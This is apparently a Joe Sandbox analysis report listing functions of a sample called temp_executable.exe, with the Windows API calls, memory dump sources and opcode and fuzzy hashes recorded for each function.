                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID: Call
                                • API String ID: 3356406503-1824292864
                                • Opcode ID: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                • Instruction ID: 602e610a5625c9c57cce2cfaa1a97c2955b97914b1987e410d3f2042aedcb8ce
                                • Opcode Fuzzy Hash: e177c4c8d31275a529affa1148de86d575541c8a0c34e9787b67721c9c916039
                                • Instruction Fuzzy Hash: 65015EB652010ABADF218FA4DD06EEF7BE8EF44754F11013AF801E22A0D374DA64DB94
                                Function 00405DF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76073420,0040399D), ref: 00405E01
                                • GetLastError.KERNEL32 ref: 00405E0B
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF9
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CreateDirectoryErrorLast
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1375471231-3355392842
                                • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                • Instruction ID: 45d9b0881c8677af27f94d707b600064aa91ade8dc0fdf8d2bf4d46db956c495
                                • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                • Instruction Fuzzy Hash: 15C012316000309BC7601B65AE089477E94DB547A13064639B988E1110D6304C5486D8
                                Function 00406E83 Relevance: 5.2, APIs: 4, Instructions: 241COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction ID: 522defa19930b26a7af3553485d7a536a03fd017600a111de47fbc571b524dd9
                                • Opcode Fuzzy Hash: 18d4879820a4453eecdf162b4afe9d44c77a4ab57f81905e4f0cda94476a9892
                                • Instruction Fuzzy Hash: 4B913371A0C3818BE364CF29C480B6BBBE1AFC9344F10892EE5D997390E774A805CB57
                                Function 6FC3167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 6FC32351: GlobalFree.KERNEL32(?), ref: 6FC32A44
                                  • Part of subcall function 6FC32351: GlobalFree.KERNEL32(?), ref: 6FC32A4A
                                  • Part of subcall function 6FC32351: GlobalFree.KERNEL32(?), ref: 6FC32A50
                                • GlobalFree.KERNEL32(00000000), ref: 6FC31738
                                • FreeLibrary.KERNEL32(?), ref: 6FC317C3
                                • GlobalFree.KERNEL32(00000000), ref: 6FC317E9
                                  • Part of subcall function 6FC31FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6FC31FFA
                                  • Part of subcall function 6FC317F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6FC31708,00000000), ref: 6FC3189A
                                  • Part of subcall function 6FC31F1E: wsprintfW.USER32 ref: 6FC31F51
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc$Librarywsprintf
                                • String ID:
                                • API String ID: 3962662361-0
                                • Opcode ID: c2efb31b0e0d282d17e84f3214f14eadbb574503e3cbf1e5bddd1f816a3b2339
                                • Instruction ID: 8321addc5d0c4073d43b60b4babdcec819e408cefae2037aa452eb5b288a5e29
                                • Opcode Fuzzy Hash: c2efb31b0e0d282d17e84f3214f14eadbb574503e3cbf1e5bddd1f816a3b2339
                                • Instruction Fuzzy Hash: 7541A533D043699FCB609F6CC844BDA37F8BB063E5F04441AF9595A182FB757549C690
                                Function 00401D01 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalFree.KERNEL32(006B0850), ref: 00401D81
                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401D93
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,00000000,?,?,?,00000000,?,?), ref: 0040604B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$AllocFreelstrcat
                                • String ID: Call
                                • API String ID: 238967769-1824292864
                                • Opcode ID: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                • Instruction ID: 3a6eff4e9616495b68701e132b411bef72aa922240f6375a3907340b29510e26
                                • Opcode Fuzzy Hash: 794f765053e152cea98927de62d8cc4c5199c0c422dd506438a960a6b0e86f42
                                • Instruction Fuzzy Hash: 7111DF72A12310EBD720AF54DD80A2B73A8FF45718B05443FF946B72D1D738A8109BAE
                                Function 004027B0 Relevance: 4.6, APIs: 3, Instructions: 53registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004027FC
                                • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Enum$CloseValue
                                • String ID:
                                • API String ID: 397863658-0
                                • Opcode ID: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                • Instruction ID: 511bfc2a391466f7e6c467a51680e698ffc79b74a509a4b58bb4b7d47538cca8
                                • Opcode Fuzzy Hash: c028264ab791648a7bbc1cf75a691ff53356d3ecc46131e95e2c9a36b3841f24
                                • Instruction Fuzzy Hash: 8D01B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A2180D7B86904866A
                                Function 00402728 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsfA9D2.tmp,?,?,00000011,00000002), ref: 0040271D
                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID:
                                • API String ID: 3356406503-0
                                • Opcode ID: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                • Instruction ID: 691293788ab813f7a02a0c784ea8aced05bc34a113cec979fc9dae3080cb0c68
                                • Opcode Fuzzy Hash: b0a53e88109fa409fa8f4e7cd217f564c495db39997ecceaaa383f5a5d51ab4f
                                • Instruction Fuzzy Hash: 4911A035658302AED7548FA4DA88A2BB3A4EF84315F10053FF142A21D1D7B85909CB5B
                                Function 004025FF Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040261E
                                • RegCloseKey.ADVAPI32(00000000), ref: 00402627
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseDeleteValue
                                • String ID:
                                • API String ID: 2831762973-0
                                • Opcode ID: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                • Instruction ID: 38e38bfe0db84342a76dd61cbaa190e5b367477f23a550be25d98ac167cb56e2
                                • Opcode Fuzzy Hash: 5b58f1ccd0e981fc5f0d95379a17638c192d39fce6d665bfeee0e3d77dcbd03f
                                • Instruction Fuzzy Hash: D5F02433645600A7E310ABA49D4AA7E765DAF903A2F11053FF642A61C4CE7E8C46862D
                                Function 00402048 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(00000000,00000000), ref: 00402061
                                • EnableWindow.USER32(00000000,00000000), ref: 0040206C
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$EnableShow
                                • String ID:
                                • API String ID: 1136574915-0
                                • Opcode ID: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                • Instruction ID: 5e1a6dc9ac369cb9fdd6eee03f9e71544f162ca31fdf6318b4aac8087fee14a7
                                • Opcode Fuzzy Hash: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                • Instruction Fuzzy Hash: 30E026726483009FE354AF20E94E96AB768EB40326F20043FF940A40C1CB7D2C41867E
                                Function 004066B1 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425200,?), ref: 004066DA
                                • CloseHandle.KERNEL32(?), ref: 004066E7
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseCreateHandleProcess
                                • String ID:
                                • API String ID: 3712363035-0
                                • Opcode ID: d807d510710fb0f7a195b4fc9a640ca68880ad9ea72be96c1146bb2738155c1a
                                • Instruction ID: 9612bf82eda4da4f7a6f16473ef610ebb4f319ab1b481eb1cc18110ef8d85365
                                • Opcode Fuzzy Hash: d807d510710fb0f7a195b4fc9a640ca68880ad9ea72be96c1146bb2738155c1a
                                • Instruction Fuzzy Hash: FAE0BFB0600609BFFB009B64ED09F7B766CFB14704F804469BD21E6191D77498158A7D
                                Function 004068F6 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                Function 6FC32D14 Relevance: 1.6, APIs: 1, Instructions: 143memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?), ref: 6FC32DD3
                                Memory Dump Source
                                • Source File: 00000002.00000002.20001269089.000000006FC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6FC30000, based on PE: true
                                • Associated: 00000002.00000002.20001233361.000000006FC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001307380.000000006FC34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000002.00000002.20001344547.000000006FC36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_6fc30000_temp_executable.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 35cd95c0d6c99202564d820f78f3d913147eae1be007ef0421cb0c0107c8eb46
                                • Instruction ID: 2b2de6024a119435339fdad734dd1e1ab683f12105dbadb76eefee5968feea25
                                • Opcode Fuzzy Hash: 35cd95c0d6c99202564d820f78f3d913147eae1be007ef0421cb0c0107c8eb46
                                • Instruction Fuzzy Hash: 28419077D047269FDF209F68DA91B8937B4EB053E8F20482AE6048B290F7369455CAD1
                                Function 00402AF5 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402B11
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: e18c58a2aa738140e54549e427365221eafe551e17cff140cde306a09a17fb3e
                                • Instruction ID: b4aa691efdd76b97e29f232bcdca97d183a91086d161f739a0adeab6622ebcbf
                                • Opcode Fuzzy Hash: e18c58a2aa738140e54549e427365221eafe551e17cff140cde306a09a17fb3e
                                • Instruction Fuzzy Hash: F8E04F726452006FE610AB51ED8AD7FB71CEB81319F14483FF544A40C1C67E6855966A
                                Function 00406923 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                Download Yara Rule
                                APIs
                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040693A
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                • Instruction ID: 2742144f5a26ad2eb6f685a055c8babc8a1130b1cd91e66bb9562d29751e6569
                                • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                • Instruction Fuzzy Hash: 7CE0BF72200119BB8F215B46DD04D9FBF6DEE956A47114026B905A6150D670EA11D6E4
                                Function 004069E6 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                Download Yara Rule
                                APIs
                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,004149C0,00403323,?,004149C0,?,004149C0,?,00000004), ref: 004069FD
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
